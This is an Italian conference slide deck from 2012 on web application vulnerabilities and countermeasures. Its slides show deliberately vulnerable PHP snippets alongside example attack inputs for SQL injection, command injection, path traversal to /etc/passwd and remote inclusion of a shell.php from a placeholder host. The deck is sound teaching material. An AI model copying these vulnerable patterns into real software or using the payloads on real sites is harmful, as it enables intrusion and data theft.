1. Odio le mie webapp.
Ma soprattutto chi le ha scritte!
Roma, Ottobre 2012
Alessio L.R. Pennasilico
mayhem@alba.st

2. Alessio L.R. Pennasilico
Security Evangelist @
Committed:
AIP Associazione Informatici Professionisti, CLUSIT
AIPSI Associazione Italiana Professionisti Sicurezza Informatica
Italian Linux Society, Sikurezza.org, AIP/OPSI
Hacker’s Profiling Project, CrISTAL
!
Alessio L.R. Pennasilico 2

3. http://www.alba.st/
Le applicazoni web

4. Web è bello!
Lavoro ovunque, comunque, a qualsiasi ora, con
qualsiasi device, accedendo a tutte le informazioni
che mi servono.
Alessio L.R. Pennasilico 4

5. Dove stava scritto sicurezza? :(
Alessio L.R. Pennasilico 5

6. Cosa si trova in giro
http://www.alba.st/

7. XSS
Affligge siti web con scarso controllo di variabili
derivate da input dell'utente. Permette di inserire
codice a livello browser al fine di modificare il
codice sorgente della pagina web visitata. In
questo modo un cracker può tentare di
recuperare dati sensibili quali cookies.
Alessio L.R. Pennasilico 7

8. SQL Injection
Sfrutta la non normalizzazione dell’input
a‘ OR ‘1’=’1
Alessio L.R. Pennasilico 8

9. Funzioni
exec() - system() - eval()
<?php
system("echo
".$_REQUEST['parametro']);
?>
Se la usassi così?
http://host/index.php?parametro=;touch
/tmp/hacked
Alessio L.R. Pennasilico 9

10. Local File Inclusion
<?php
include('/var/www/articoli/'
.
$_REQUEST['articolo']);
?>
L'utilizzo normale sarebbe:
http://host/index.php?articolo=sport.html
ma posso usarlo così:
http://host/index.php?articolo=../../../etc/passwd
Alessio L.R. Pennasilico 10

11. Remote File Inclusion
<?php
include($_GET['page']);
?>
Se la usassi così?
http://host/index.php?page=http://xxx/shell.php
Alessio L.R. Pennasilico 11

12. Esempi reali
IIS Webservice
user e pass hardcoded
Alessio L.R. Pennasilico 12

13. Esempi reali
e-commerce
javascript
dati letti dal server ed inviati dal client
prezzi inclusi
Alessio L.R. Pennasilico 13

14. Esempi reali
Quanto sono comodi i tab?
Alessio L.R. Pennasilico 14

15. http://www.alba.st/
Le contromisure

16. Filtrare a monte
UTM Firewall
IDS / IPS
DLP
Alessio L.R. Pennasilico 16

17. Software layer
Reverse Proxy
mod_*
Alessio L.R. Pennasilico 17

18. Configurare bene il sistema
chroot
privilege drop
permessi
mod_*
Alessio L.R. Pennasilico 18

19. Scrivere bene le app
input validation
controlli server side
Alessio L.R. Pennasilico 19

20. Standard e check
OWASP - Code review
OSSTMM - PenTest
Repetita iuvant
Alessio L.R. Pennasilico 20

21. Mitigare...
Eliminare le classiche cause di vulnerabilità
es: le password!
Alessio L.R. Pennasilico 21

22. Spiegare
Molti attacchi si possono evitare
con la user awarness
Alessio L.R. Pennasilico 22

23. Risolvere il problema
http://www.alba.st/

24. Conclusioni
Senza scrivere buon codice
tutto il resto è un palliativo!
Alessio L.R. Pennasilico 24

25. Conclusioni
Preoccupatevi delle persone,
più della tecnologia!
Alessio L.R. Pennasilico 25

26. Grazie
dell’attenzione! These slides are
written by Alessio L.R.
Pennasilico aka
mayhem. They are
subjected to Creative
Commons Attribution-
ShareAlike-2.5
version; you can copy,
modify, or sell them.
“Please” cite your
source and use the
same licence :)
Roma, Ottobre 2012
Alessio L.R. Pennasilico
mayhem@alba.st